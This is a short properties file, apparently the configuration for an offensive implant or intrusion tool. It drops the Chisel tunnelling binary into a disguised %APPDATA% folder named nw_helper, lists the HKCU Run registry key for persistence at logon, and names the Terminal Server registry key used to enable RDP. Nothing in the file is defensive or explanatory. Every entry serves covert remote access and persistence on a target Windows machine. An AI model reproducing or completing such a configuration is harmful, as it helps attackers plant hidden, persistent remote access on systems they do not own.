client.chisel.dir=%APPDATA%\\nw_helper
client.win.bin=binaries\\chisel.exe
server.ip=127.0.0.1
chisel.exe=chisel.exe
persist.reg.key=HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
rdp.enable.reg.key=\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\"
local.chisel.exec=binaries\\chisel.exe